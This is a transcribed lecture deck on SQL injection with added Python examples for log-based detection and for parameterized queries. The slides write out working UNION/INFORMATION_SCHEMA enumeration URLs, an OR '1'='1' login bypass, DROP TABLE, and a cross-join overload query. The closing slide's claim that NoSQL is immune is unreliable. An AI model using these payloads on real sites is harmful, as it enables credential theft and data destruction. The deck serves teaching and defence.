A Brief Introduction in SQL Injection

Sina Manavi, Security Lab, University Putra Malaysia, 23 May 2013
Contact: http://sinamanavi.blogspot.com/p/about-me.html
Posted Nov 19, 2014 (22 slides)

Page 1: A Brief Introduction in SQL Injection

Security Lab, University Putra Malaysia, 23 May 2013. Sina Manavi

Contact: http://sinamanavi.blogspot.com/p/about-me.html

Page 2: A Brief Introduction in SQL Injection

• Introduction
• Why SQL Injection
• What is needed for this
• What you can do with SQL Injection
• What are its pros and cons
• Why we need to know about it, and how we can protect our database from SQL injection attacks

Page 3: A Brief Introduction in SQL Injection

We are all familiar with the SQL language. It is one of the technologies that helped turn the static web into a dynamic one. SQL is relatively easy to read, a little more difficult to write. It works on servers such as Apache, MS Server, etc.

SQL injection means manipulating SQL tables through unauthorized access.

Page 4: A Brief Introduction in SQL Injection

Page 5: A Brief Introduction in SQL Injection

SQL injection may happen in only two forms, UI based or URL based:

◦ (1) Injecting into a form, such as the username and password boxes on a login page.

◦ (2) Injecting into a URL, like http://yourtarget.com/products/list.php?pid=10

Page 6: A Brief Introduction in SQL Injection

Simple example:

SELECT ID FROM tbl_users
WHERE ID = 'Uid' AND pass = 'pass'

◦ If it returns any value, the current inputs are correct.

Page 7: A Brief Introduction in SQL Injection

www.yourtarget.com/list?id=5

If you want to view a record from a table by URL-based injection, the query behind the page is:

SELECT * FROM tbl_users
WHERE id = 5

Page 8: A Brief Introduction in SQL Injection

The INFORMATION_SCHEMA holds the names of every table and column in the database, and its own name never changes.

◦ Table holding all the table names: INFORMATION_SCHEMA.TABLES

◦ Table holding all the column names: INFORMATION_SCHEMA.COLUMNS

Page 9: A Brief Introduction in SQL Injection

Finding the column count:
◦ www.yourtarget.com/list.php?ID=10+ORDER+BY+1--
Increase the 1 until you get an error; the last number that worked is the column count.

Finding the table name:
◦ www.yourtarget.com/list.php?ID=-1+UNION+SELECT+1,2,3+FROM+INFORMATION_SCHEMA.TABLES--

And it shows: tbl_user

To be continued

Page 10: A Brief Introduction in SQL Injection

Now it's time to find out the column names:
www.yourtarget.com/list.php?ID=-1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name='tbl_user'--

The result would be as follows: id, username, password

Column-name finding step:
www.yourtarget.com/list.php?ID=-1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name='UserAccounts'+AND+column_name>'displayed_column'--

Try the column names until you find your target (e.g. username, password, or login).
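From the defender's side, the ORDER BY and UNION SELECT probes on pages 9 and 10 leave a distinctive trail in the web server's access log. The following Python script is an added example, not part of the slides: it parses combined-format log lines (the sample lines below are constructed, using the deck's own query strings once with `+` encoding and once with `%xx` encoding), URL-decodes each query parameter so both encodings look alike, matches a small set of indicators against the decoded value, and reports how far along the deck's enumeration sequence each source IP got. The log format, indicator regexes and function names (`inspect_request`, `scan_log`, `enumeration_stage`) are this example's own assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed combined-log-style lines (sample data, not real traffic). The
# query strings are the ones the slides show, once with '+' and once with %xx.
SAMPLE_LOG = """\
203.0.113.5 - - [23/May/2013:10:01:02 +0800] "GET /list.php?ID=10 HTTP/1.1" 200 512
203.0.113.5 - - [23/May/2013:10:01:09 +0800] "GET /list.php?ID=10+ORDER+BY+1-- HTTP/1.1" 200 512
203.0.113.5 - - [23/May/2013:10:01:15 +0800] "GET /list.php?ID=10+ORDER+BY+4-- HTTP/1.1" 500 231
203.0.113.5 - - [23/May/2013:10:02:01 +0800] "GET /list.php?ID=-1+UNION+SELECT+1,2,3+FROM+INFORMATION_SCHEMA.TABLES-- HTTP/1.1" 200 640
203.0.113.5 - - [23/May/2013:10:02:30 +0800] "GET /list.php?ID=-1%20UNION%20SELECT%201,column_name,3%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name=%27tbl_user%27-- HTTP/1.1" 200 700
198.51.100.7 - - [23/May/2013:10:03:00 +0800] "GET /list.php?ID=7 HTTP/1.1" 200 512
"""

# Assumed log layout: client ip, two "-" fields, [timestamp], "METHOD target PROTO", status
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators taken from the probes on pages 9 and 10; each is tested against
# the URL-decoded parameter value so that '+' and %xx encodings look the same.
INDICATORS = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
    "comment_tail": re.compile(r"(--|#)\s*$"),
}


def inspect_request(line):
    """Parse one log line. Returns (ip, status, hits), where hits is a list of
    (param, decoded_value, [indicator names]) for every parameter that matched,
    or None when the line is not in the expected format."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    query = urlsplit(m["target"]).query
    hits = []
    # parse_qsl maps '+' to space and decodes %27 etc. before we look at the value
    for name, value in parse_qsl(query, keep_blank_values=True):
        matched = [ind for ind, rx in INDICATORS.items() if rx.search(value)]
        if matched:
            hits.append((name, value, matched))
    return m["ip"], int(m["status"]), hits


def scan_log(text):
    """One finding per request that carries at least one indicator."""
    findings = []
    for line in text.splitlines():
        parsed = inspect_request(line)
        if parsed and parsed[2]:
            ip, status, hits = parsed
            findings.append({"ip": ip, "status": status, "hits": hits})
    return findings


def enumeration_stage(findings):
    """Furthest stage of the slides' sequence seen per source IP:
    1 = ORDER BY column-count probing, 2 = UNION SELECT, 3 = INFORMATION_SCHEMA read."""
    stage = {}
    for f in findings:
        names = {ind for _, _, inds in f["hits"] for ind in inds}
        if "information_schema" in names:
            s = 3
        elif "union_select" in names:
            s = 2
        elif "order_by_probe" in names:
            s = 1
        else:
            s = 0
        stage[f["ip"]] = max(stage.get(f["ip"], 0), s)
    return stage


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        for param, value, inds in f["hits"]:
            print(f'{f["ip"]} status={f["status"]} {param}={value!r} -> {", ".join(inds)}')
    print("stage per source:", enumeration_stage(found))
```

The status column is kept on purpose: the 500 returned for `ORDER BY 4` is exactly the error the slide tells the attacker to look for, so a probe followed by a server error from the same source is a stronger signal than either alone. Matching on decoded values rather than raw URLs is what keeps the `%20`/`%27` variant from slipping past a pattern written for the `+` form.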

Page 11: A Brief Introduction in SQL Injection

And finally it's time to see the records:
◦ www.yourtarget.com/list.php?ID=-1+UNION+SELECT+1,username,3+FROM+UserAccounts--

And
◦ www.yourtarget.com/list.php?ID=-1+UNION+SELECT+1,password,3+FROM+UserAccounts--

◦ Username=admin password=123456

◦ Stupid admin, ha ;)

Page 12: A Brief Introduction in SQL Injection

Now we can alter the records as well; let's rock.

UPDATE tbl_user
SET password = SHA2('$password', 256)
WHERE id = $id

Or we can insert a new user with the INSERT command.

Page 13: A Brief Introduction in SQL Injection

If user_list contains 1000 records, then the database is fired up by a query like the one below: each JOIN without a condition is a cross join, so the result has 1000^6 rows.

SELECT * FROM user_list a JOIN user_list b JOIN user_list c JOIN user_list d JOIN user_list e JOIN user_list f

Page 14: A Brief Introduction in SQL Injection

Insert a new user into tbl_user.

The malicious code can be:

DROP TABLE tbl_user

Page 15: A Brief Introduction in SQL Injection

How it works:

SELECT * FROM tbl_users
WHERE id = 'Fname' AND pass = 'pass'

Malicious code:

SELECT * FROM tbl_users WHERE id = 'Fname' OR '1'='1';
if (mysql_num_rows($result)) // do login

Now the unauthorized user gets access easily and bypasses the authorization.

Page 16: A Brief Introduction in SQL Injection

Security is the developer's job. No database, connector, or framework can prevent SQL injection all the time.

Page 17: A Brief Introduction in SQL Injection

• Implement proper error handling. This would include using a single error message for all errors.

• Lock down the user database configuration: specify users, roles and permissions, etc.

• Prefix and append a quote to all user input, even if the data is numeric.

Page 18: A Brief Introduction in SQL Injection

<?php
function sanitize($string) {
    $string = strip_tags($string);
    $string = htmlspecialchars($string);
    $string = trim(rtrim(ltrim($string)));
    $string = mysql_real_escape_string($string);
    return $string;
}

$password = sanitize($_POST["password"]);
// Only $password is escaped and quoted; $user_id is interpolated bare, so the escaping does not cover it.
mysql_query("UPDATE Users SET password = '$password' WHERE user_id = $user_id");
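The login check on page 15 and the escape-then-paste update on page 18 fail for the same underlying reason: user input is spliced into SQL text, so the database cannot tell value from syntax. The Python script below is an added example (not the slides' code, and not PHP/MySQL): it uses Python's built-in sqlite3 driver as a stand-in, with a constructed tbl_users, and places the slide's string-concatenation pattern beside the parameterized form for both cases. The `' OR '1'='1` tail is the page-15 input; the bare-id update shows why quote-escaping alone (the page-18 `sanitize`) does nothing for a value that is never quoted. Function names (`fresh_db`, `login_concat`, `login_param`, `escape_quotes`, `set_password_escaped`, `set_password_param`) and the sample rows are this example's own.

```python
import sqlite3


def fresh_db():
    """In-memory SQLite database with a constructed tbl_users (sample rows, not the slides' data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tbl_users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany(
        "INSERT INTO tbl_users (id, username, password) VALUES (?, ?, ?)",
        [(1, "admin", "s3cret"), (2, "alice", "pw-alice"), (3, "bob", "pw-bob")],
    )
    db.commit()
    return db


# ---- Page 15: the login check ---------------------------------------------

def login_concat(db, username, password):
    """The slide's pattern: user input pasted into the SQL text."""
    sql = (f"SELECT id FROM tbl_users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return db.execute(sql).fetchone() is not None


def login_param(db, username, password):
    """Hardened form: bound parameters, so the input is only ever a value."""
    sql = "SELECT id FROM tbl_users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None


# ---- Page 18: escape and quote the password, paste the id bare ------------

def escape_quotes(s):
    """Stand-in for mysql_real_escape_string in SQLite's dialect: doubles single quotes."""
    return s.replace("'", "''")


def set_password_escaped(db, user_id, new_password):
    """The slide's pattern: the password is escaped and quoted, but user_id is
    interpolated without quotes, so quote-escaping cannot protect it.
    Returns the ids whose password now equals new_password."""
    sql = (f"UPDATE tbl_users SET password = '{escape_quotes(new_password)}' "
           f"WHERE id = {user_id}")
    db.execute(sql)
    db.commit()
    rows = db.execute("SELECT id FROM tbl_users WHERE password = ? ORDER BY id", (new_password,))
    return [r[0] for r in rows]


def set_password_param(db, user_id, new_password):
    """Hardened form: validate the id as an integer (form input arrives as text)
    and bind both values. Returns the number of rows updated."""
    uid = int(user_id)  # raises ValueError on anything that is not an integer
    cur = db.execute("UPDATE tbl_users SET password = ? WHERE id = ?", (new_password, uid))
    db.commit()
    return cur.rowcount


if __name__ == "__main__":
    BYPASS = "' OR '1'='1"  # the tail shown on page 15
    db = fresh_db()
    print("concat login, bypass tail as password:", login_concat(db, "nobody", BYPASS))  # True
    print("param  login, bypass tail as password:", login_param(db, "nobody", BYPASS))   # False
    print("escaped update, id '2 OR 1=1' hits:", set_password_escaped(fresh_db(), "2 OR 1=1", "x"))  # [1, 2, 3]
    print("param update, id '2' rows:", set_password_param(fresh_db(), "2", "x"))  # 1
```

Two points worth noticing. The escaped version is not "almost safe": the whole table's passwords are overwritten because the id lands in a numeric context where quotes are never involved. And the parameterized update does not rely on the driver for the id at all; converting it with `int()` first rejects anything that is not a number before any SQL runs, which is the cheap input validation that page 17's advice is reaching for.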

Page 19: A Brief Introduction in SQL Injection

Vipin Samar, Oracle vice president of Database Security:

"Database Firewall is a good first layer of defense for databases but it won't protect you from everything."

Page 20: A Brief Introduction in SQL Injection

Using stored procedures:

CREATE PROCEDURE SP_show_user(IN U_ID INT)
BEGIN
    SELECT * FROM Bugs WHERE User_ID = U_ID;
END

CALL SP_show_user(54)

"Might be helpful but still vulnerable"

Page 21: A Brief Introduction in SQL Injection

• I don't have to worry anymore
• Escaping is the fix
• More escaping is better
• I can code an escaping function
• Only user input is unsafe
• Stored procs are the fix
• SQL privileges are the fix
• My app doesn't need security
• Frameworks are the fix
• Parameters quote for you
• Parameters are the fix
• Parameters make queries slow
• SQL proxies are the fix
• NoSQL databases are the fix

Page 22: A Brief Introduction in SQL Injection

NoSQL databases are immune to SQL injection.